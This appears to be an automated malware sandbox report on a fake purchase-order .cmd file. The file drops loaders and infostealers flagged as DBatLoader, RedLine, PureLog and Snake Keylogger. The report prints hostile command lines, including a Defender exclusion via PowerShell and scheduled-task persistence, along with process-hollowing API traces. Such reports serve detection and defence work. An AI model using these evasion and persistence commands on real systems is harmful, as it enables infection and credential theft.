2024-12-30 10:47:05 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 10:47:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 870414 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltuuTLEr3cWOPOpV1NJelM%2FJJ6DOu1DtzA8lb2Ij4jz%2FTOLEt062Pztmgje6CxJbfKs6tisj7CCHSD5Bmyq%2FYlig6GJxieG9qyPTQTYAdjr4MzHifFlhTd68hGZ5j9%2F7uEeQDOxd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa173238821c347-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1733&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1649717&cwnd=187&unsent_bytes=0&cid=fe05c71c816393d5&ts=313&x=0"
2024-12-30 10:47:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	05:46:52
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" "
Imagebase:	0x7ff6c3940000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:46:52
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:46:52
Start date:	30/12/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff7bb6e0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:46:53
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'367'040 bytes
MD5 hash:	9B151296A899B0D58575CDE4E9563D18
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2176575888.0000000002206000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2259800821.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:46:58
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:46:58
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:46:58
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2209421224.0000000001420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000001.2174375803.0000000001420000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:47:01
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:	0x2f0000
File size:	70'656 bytes
MD5 hash:	E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:47:01
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Microsofts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Imagebase:	0x6e0000
File size:	98'816 bytes
MD5 hash:	F6B8018A27BCDBAA35778849B586D31B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3379727606.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:47:03
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xb40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:47:03
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xba0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:47:03
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:47:03
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:47:09
Start date:	30/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:47:11
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\Oupzhkpr.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Oupzhkpr.PIF"
Imagebase:	0x400000
File size:	1'367'040 bytes
MD5 hash:	9B151296A899B0D58575CDE4E9563D18
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 18%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:47:11
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2792, Parent PID: 5900

General

Target ID:	20
Start time:	05:47:11
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:47:12
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:47:20
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\Oupzhkpr.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Oupzhkpr.PIF"
Imagebase:	0x400000
File size:	1'367'040 bytes
MD5 hash:	9B151296A899B0D58575CDE4E9563D18
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:47:21
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0xf20000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7008, Parent PID: 5880

General

Target ID:	25
Start time:	05:47:21
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:47:21
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:47:30
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\Oupzhkpr.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Oupzhkpr.PIF"
Imagebase:	0x400000
File size:	1'367'040 bytes
MD5 hash:	9B151296A899B0D58575CDE4E9563D18
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:47:31
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x440000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5936, Parent PID: 3080

General

Target ID:	30
Start time:	05:47:31
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:47:31
Start date:	30/12/2024
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:48:01
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0x9e0000
File size:	665'670'656 bytes
MD5 hash:	8D01E7CA64DB66A5D357A071C6E39643
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.3%
Total number of Nodes:	290
Total number of Limit Nodes:	15

Executed Functions

Function 02B38BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3

Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660

GetThreadContext.KERNEL32(00000900,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A

Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD

Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521

Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F

Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C

SetThreadContext.KERNEL32(00000900,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,000008FC,00269FF8,02B814F8,00000004,02B814FC), ref: 02B3A14F
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000900,00000000,00000900,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,000008FC,00269FF8,02B814F8), ref: 02B3A15C

Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802

Strings

OpenSession, xrefs: 02B38BE1, 02B39004, 02B390B6, 02B3A487, 02B3A5CD
NtSetSecurityObject, xrefs: 02B3A6C7
NtReadVirtualMemory, xrefs: 02B3A458
NtOpenProcess, xrefs: 02B3A6DB
BCryptQueryProviderRegistration, xrefs: 02B3A3BF
Initialize, xrefs: 02B38F22, 02B39530, 02B396B7, 02B39AA0, 02B39D02, 02B39E72, 02B39FE5, 02B3A24A, 02B3A57B
I_QueryTagInformation, xrefs: 02B3A538
UacScan, xrefs: 02B38CAB, 02B38EC3, 02B394BF, 02B398BB, 02B39A2F, 02B3A1D9, 02B3A671
advapi32, xrefs: 02B3A53D
SLGetLicenseInformation, xrefs: 02B39197
BCryptVerifySignature, xrefs: 02B3A3AB
dbgcore, xrefs: 02B3A551, 02B3A565
ntdll, xrefs: 02B3A45D, 02B3A471, 02B3A529, 02B3A6CC, 02B3A6E0
MiniDumpReadDumpStream, xrefs: 02B3A560
UacInitialize, xrefs: 02B38E6A, 02B391CB, 02B3934A, 02B3944E, 02B3984A, 02B399BE, 02B3A168
MiniDumpWriteDump, xrefs: 02B3A54C
ScanString, xrefs: 02B38C3A, 02B38DE5, 02B38F93, 02B393BB, 02B395A1, 02B39728, 02B39BB5, 02B39D73, 02B39EE3, 02B3A056, 02B3A341, 02B3A3EE
NtOpenObjectAuditAlarm, xrefs: 02B3A46C, 02B3A524
bcrypt, xrefs: 02B3A3B0, 02B3A3C4, 02B3A3D8
BCryptRegisterProvider, xrefs: 02B3A3D3
sppc, xrefs: 02B391AE
ScanBuffer, xrefs: 02B38D04, 02B38D8C, 02B39127, 02B3923C, 02B392D9, 02B39612, 02B39799, 02B3992C, 02B39B11, 02B39C26, 02B39DE4, 02B39F54, 02B3A0C7, 02B3A2BB, 02B3A4D9, 02B3A61F

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
